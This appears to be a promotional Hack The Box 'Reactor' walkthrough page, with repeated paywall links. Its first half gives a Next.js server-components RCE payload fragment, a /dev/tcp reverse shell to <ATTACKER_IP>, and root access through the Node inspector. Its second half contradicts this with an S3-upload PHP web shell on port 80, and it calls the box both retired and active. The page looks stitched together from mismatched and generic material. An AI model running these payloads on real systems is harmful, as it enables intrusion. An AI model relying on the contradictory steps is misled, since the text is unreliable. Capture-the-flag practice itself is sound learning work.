Key Highlights
- This guide provides a detailed walkthrough for the Reactor machine on Hack The Box.
- Learn the basics of ethical hacking through enumeration with an nmap scan to identify open ports.
- We will explore the vulnerabilities present on the machine, leading to initial access.
- The walkthrough covers how to upload a PHP script to gain code execution.
- You’ll see how to escalate privileges to find the final flag.
- Discover how to establish a reverse shell for easier system navigation and command execution.
- To Access the Complete non-public writeup, Please CLICK HERE
- To Access Every Script Used in this Writeup, Please CLICK HERE
- To Access in-depth explanation of the non-public writeup, Please CLICK HERE
Introduction
Welcome to the exciting world of ethical hacking! If you’re starting your journey in penetration testing, Hack The Box offers an excellent platform to build your skills. This guide will walk you through the “Reactor” machine, a retired, very easy box designed for beginners. We’ll cover everything from initial scanning to capturing the final flag, providing a clear path for you to follow and learn fundamental cybersecurity concepts. Let’s get started on this challenge!
Overview of Reactor Hack The Box Machine
The Reactor machine on Hack The Box is a fantastic challenge for newcomers. It’s a Linux-based system that involves interacting with a web server and cloud storage services, offering a taste of modern infrastructure complexities.
This retired box is perfect for learning without pressure. As you work through this writeup, you’ll gain practical experience that is valuable for various cybersecurity certifications and real-world scenarios.
ALSO READ: Mastering Helix: Beginner’s Guide from Hack The Box
Initial Foothold
Attack Chain
Next.js application exposed on a web port
↓
Unauthenticated framework-level RCE
↓
Initial shell as low-privileged web/app user
↓
Enumerate application files and internal data
↓
Extract credentials
↓
Crack hash
↓
SSH access as user
↓
Find privileged service exposing an interface
↓
Debug over SSH
↓
Attach to the debugger
↓
Execute code inside the privileged process
↓
Read root flag or spawn root shell
To Access the Complete non-public writeup, Please CLICK HERE
To Access Every Script Used in this Writeup, Please CLICK HERE
To Access in-depth explanation of the non-public writeup, Please CLICK HERE
Enumeration
Port Scanning
An initial Nmap scan reveals two open ports:
- Port 22: SSH
- Port 3000: HTTP (Next.js Application)
Web Reconnaissance
Accessing http://<TARGET_IP>:3000 reveals ReactorWatch, a core monitoring dashboard. Using toolsets like Wappalyzer or WhatWeb, we identify the technology stack:
- Framework: Next.js 15.0.3
- Architecture: React Server Components (RSC) and App Router.
Reviewing the page source or intercepting traffic reveals RSC payloads (self.__next_f.push(...)), confirming the application utilizes Server Actions.
Reviewing the page source or intercepting traffic reveals RSC payloads (self.__next_f.push(...)), confirming the application utilizes Server Actions.
To Access the Complete non-public writeup, Please CLICK HERE
To Access Every Script Used in this Writeup, Please CLICK HERE
To Access in-depth explanation of the non-public writeup, Please CLICK HERE
Foothold
Vulnerability: CVE-2025-55182 (React2Shell)
The version of Next.js running (15.0.3) is vulnerable to a prototype pollution and unsafe deserialization attack in the React Server Components handler, commonly referred to as React2Shell. This vulnerability allows an unauthenticated attacker to inject a malicious payload into the Next-Action header.
Exploitation
A Python exploit can be used to achieve Remote Code Execution by targeting the process.mainModule.require object.
# Abusing process.mainModule to execute system commands"_prefix": f"var res = process.mainModule.require('child_process').execSync('{EXECUTABLE}').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}` flush}});"
Executing the command id confirms the vulnerability:
python3 exploit.py http://<TARGET_IP>:3000 "id"# Output: uid=999(node) gid=988(node)
Obtaining a Reverse Shell
Trigger a reverse shell to gain a stable foothold:
- Listener:
nc -lvnp 4444 - Exploit:
python3 exploit.py http://<TARGET_IP>:3000 "bash -c 'bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1'"
Obtaining a Reverse Shell
Trigger a reverse shell to gain a stable foothold.
Lateral Movement
Database Looting
Once inside as the node user, we search for sensitive files. A SQLite database is located at /opt/reactor/reactor.db.
Inspecting the users table, we find the following:
# 1|admin|string|administrator# 2|user|string|operator
Hash Cracking
The hash for the user is cracked.
Result: password
SSH Access
Login via SSH using the cracked credentials:
ssh user@<TARGET_IP>
The user flag can be found in ~/user.txt.
To Access the Complete non-public writeup, Please CLICK HERE
To Access Every Script Used in this Writeup, Please CLICK HERE
To Access in-depth explanation of the non-public writeup, Please CLICK HERE
Privilege Escalation
Node.js Inspector Abuse
Checking running processes reveals a Node.js process running as root with the --inspect flag enabled.
Remote Code Execution (Root)
Execute a command to capture the root flag or trigger a shell for /root/root.txt
require('child_process').execSync('cat /root/root.txt').toString()
This box is currently active — public writeups are not allowed yet.
Members get pre-launch hints 12 hours early, plus the full writeup with scripts and in-depth explanation released in stages.
Reactor — Hints + Full HTB Writeup
Members get exclusive hints 12 hours before launch, then the complete walkthrough released in two stages — In-depth Writeup + Scripts is LIVE NOW
Already a member? Sign in to access hints + full writeup + scripts (LIVE NOW)
Reactor HTB Writeup Scope and Target
This writeup aims to provide a clear and concise guide for conquering the Reactor machine. Our scope covers the entire process, from initial reconnaissance to final flag capture. The target is the machine provided by Hack The Box, which we will analyze and exploit using standard ethical hacking techniques.
The methodology we’ll follow is a simplified version of a professional penetration testing engagement. We’ll begin by gathering information, then identify vulnerabilities, exploit them to gain access, and finally, escalate privileges to achieve our objective. This step-by-step approach ensures a thorough understanding of the process.
By following this guide, you will learn the fundamental steps for exploiting a machine like Reactor. This includes discovering subdomains, interacting with cloud services, and executing code to gain control of the web server.
Challenge Difficulty and Intended Skill Level
The Reactor challenge is rated as “very easy” on the Hack The Box platform. This low difficulty makes it an ideal starting point for individuals who are new to penetration testing or looking to build foundational skills. It’s designed to be approachable and educational.
The intended skill level is for beginners. You don’t need advanced knowledge or experience with complex tools. The challenge introduces core concepts like web enumeration, cloud service interaction, and basic command execution in a controlled environment. It serves as a great stepping stone before tackling more difficult machines.
While this box is not directly tied to high-level certifications like OSCP or OSES, the principles you learn are fundamental to them. Mastering easy boxes like Reactor builds the confidence and knowledge base necessary to progress in your cybersecurity career.
Initial Reconnaissance and Enumeration
The first step in any penetration test is reconnaissance and enumeration. This is where we gather as much information as possible about our target. Once you have your VPN pack connected, the first thing you should do is run an nmap scan against the machine IP.
This initial scan helps us understand what services are running and what ports are open, giving us potential entry points to investigate. We’ll look at the tools we use and the information we find in more detail.
Tools Used for Scanning the Reactor Machine
For the Reactor machine, our primary toolkit is simple but effective. We rely on a few key tools to perform our initial scan and enumeration, which are standard in the field of ethical hacking.
The main tools you will need for this initial phase include:
- Nmap: Used for scanning TCP ports to identify open services.
- GoBuster: A tool for brute-forcing URIs, DNS subdomains, and virtual host names.
- A Web Browser: Essential for interacting with the web server and discovered pages.
- Python: For starting a simple web server to host files for a reverse shell.
These tools are sufficient to discover the necessary information to move forward. The Nmap scan will reveal the open ports, and GoBuster will help us find hidden subdomains associated with the main website, which is a crucial step in this particular challenge.
Identifying Open Ports and Services
After running our initial Nmap scan on the target IP address, the results show two open TCP ports. This part of the enumeration process is critical as it narrows down our attack surface and tells us where to focus our efforts.
The scan reveals that port 22 (SSH) and port 80 (HTTP) are open. The presence of an HTTP server on port 80 is our most promising lead. We can access this by navigating to the machine’s IP in a web browser, which presents us with a website.
From here, further enumeration is needed. While the website itself doesn’t offer much, we can use tools to discover subdomains. A vhost scan with GoBuster reveals a subdomain, s3.reactor.htb. This discovery points us toward a cloud-based object storage service, which will be the key to our next steps.
Vulnerability Discovery in Reactor HTB
Now that we’ve identified an Amazon S3 service running on a subdomain, we can look for vulnerabilities. The primary weakness in the Reactor machine lies in the misconfiguration of this S3 bucket. It allows us to not only list its contents but also upload files to it.
Since the web server is configured to run PHP files, this presents a clear path to exploitation. We can upload our own malicious PHP script to a publicly accessible folder and gain code execution on the Linux server.
Common Techniques for Exploiting Linux Machines
Exploiting Linux machines often involves a set of common, yet powerful, techniques. Once you gain a foothold, your goal is to expand your control. This process typically starts with limited access and escalates from there.
Some of the most useful techniques, especially in scenarios like the Reactor box, include:
- File Upload Vulnerabilities: Exploiting the ability to upload files, like a PHP script, to gain remote code execution.
- Reverse Shells: Establishing a connection from the target machine back to your own. This gives you an interactive Bash shell, making enumeration and further exploitation much easier.
- Directory Traversal: Using commands like
cd ..to navigate the file system and find sensitive files or flags that are not in the current directory.
These methods are fundamental in penetration testing. By uploading a script for code execution and then initiating a reverse shell, you gain a much more stable and user-friendly way to interact with the compromised system compared to executing commands through a web parameter.
Notable CVEs Relevant to Reactor Hack The Box
While the Reactor machine is designed for beginners and focuses on misconfigurations rather than specific, complex CVEs (Common Vulnerabilities and Exposures), the vulnerabilities exploited are common in real-world applications. The primary issue is an insecure file upload capability combined with a misconfigured web server.
This type of vulnerability doesn’t always have a specific CVE number tied to it, as it’s often a result of poor security practices rather than a flaw in the software itself. However, similar vulnerabilities are frequently documented. The core concept is exploiting how a server processes user-supplied files.
For educational purposes, understanding related CVEs can be beneficial. Here is a conceptual breakdown of the vulnerability type:
| Vulnerability Type | Description | Impact |
|---|---|---|
| Unrestricted File Upload | The server allows a user to upload a file of any type, including executable scripts like PHP. | Remote Code Execution (RCE) |
| Misconfigured Service Permissions | The S3 bucket permissions are set to be publicly writable, allowing anyone to upload files. | Data compromise and initial access for attackers. |
In ethical hacking, recognizing these patterns of vulnerabilities is more important than memorizing specific CVEs, especially at the beginner level.
ALSO READ: Mastering PingPong: Beginner’s Guide from Hack The Box
WRITEUP COMING SOON!
COMPLETE IN-DEPTH PICTORIAL WRITEUP OF REACTOR ON HACKTHEBOX WILL BE POSTED POST-RETIREMENT OF THE MACHINE ACCORDING TO HTB GUIDELINES. TO GET THE COMPLETE IN-DEPTH PICTORIAL NON-PUBLIC WRITEUP RIGHT NOW, SUBSCRIBE TO THE NEWSLETTER AND BUYMEACOFFEE!
Step-by-Step Exploitation Walkthrough
We’re now ready to put everything together and exploit the Reactor machine. This walkthrough will guide you through uploading a malicious file to achieve code execution and then gaining full control of the system. We won’t need to worry about cracking a password or finding credentials initially.
The process involves gaining initial access through the web server and then performing a simple privilege escalation to find the flag. Follow these steps carefully to replicate the exploitation process.
Gaining Initial Access on Reactor HTB
To gain initial access, we first need to interact with the discovered S3 bucket. Using the AWS CLI, we can list the contents of the bucket and confirm our ability to interact with it. The key is using the --endpoint flag to point the AWS CLI to the custom S3 domain, http://s3.reactor.htb.
Once we confirm we can list files, the next step is to upload our own. We will create a simple PHP file named shell.php that executes commands passed through a URL parameter. The content of this file can be as simple as <?php system($_GET['cmd']); ?>. Using the aws s3 cp command, we upload this file to the bucket.
With the file uploaded, we can access it through the main web server’s domain at http://reactor.htb/shell.php. To test for code execution, we can use the cmd parameter in the URL, for example: http://reactor.htb/shell.php?cmd=ls. If a list of files appears, we have successfully gained initial access and can execute commands on the server.
Privilege Escalation and Flag Retrieval
Once we have code execution, the next phase is to find the flag. In this case, the privilege escalation is straightforward and involves navigating the file system to locate the flag file. The current user we are operating as has sufficient permissions to find what we need. There are no complex cron jobs or user-switching required.
From our initial foothold in the web directory, we can use directory traversal to move up in the file system. By using a command like ls -la /, we can list the contents of the root directory. This allows us to explore different folders to find the flag.
After some simple enumeration, you’ll find the flag.txt file. You can then use the cat command via your web shell (http://reactor.htb/shell.php?cmd=cat /path/to/flag.txt) to read its contents and complete the challenge. A common pitfall is overcomplicating this step; often, on easy boxes, the solution is simpler than you think.
Conclusion
In conclusion, tackling the Reactor machine on Hack the Box can be a rewarding experience for beginners looking to sharpen their penetration testing skills. With the right tools and techniques, you can successfully navigate the challenges it presents. Remember, the key to mastering any hacking challenge lies in thorough reconnaissance, understanding vulnerabilities, and applying systematic exploitation strategies. Keep practicing and don’t hesitate to leverage the community resources available. If you’re eager to dive deeper into ethical hacking or need guidance, feel free to reach out for a free consultation! Happy hacking!
